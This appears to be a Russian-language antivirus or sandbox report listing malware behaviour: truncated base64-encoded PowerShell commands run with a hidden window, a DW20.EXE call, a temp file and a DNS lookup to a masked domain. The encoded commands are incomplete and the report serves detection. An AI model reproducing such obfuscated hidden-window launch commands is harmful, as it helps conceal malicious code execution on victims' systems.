Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADEAXwA0ADcAOQA4ADgAPQAnAEwANAAxADAANAAyAF8AJwA7ACQARAAxADkAMAAzAF8AIAA9ACAAJwA4ADUANAAnADsAJAB6ADYANQA3ADMAMABfAF8APQAnAG8AMQA0ADEAMgAzACcAOwAkAHoANgAzADcANwA0AD0AJABlAG4AdgA6AHUAcwB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1952
- %TEMP%\1043553.cvr
- DNS ASK hv####ichelfd.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADEAXwA0ADcAOQA4ADgAPQAnAEwANAAxADAANAAyAF8AJwA7ACQARAAxADkAMAAzAF8AIAA9ACAAJwA4ADUANAAnADsAJAB6ADYANQA3ADMAMABfAF8APQAnAG8AMQA0ADEAMgAzACcAOwAkAHoANgAzADcANwA0AD0AJABlAG4AdgA6AHUAcwB...' (со скрытым окном)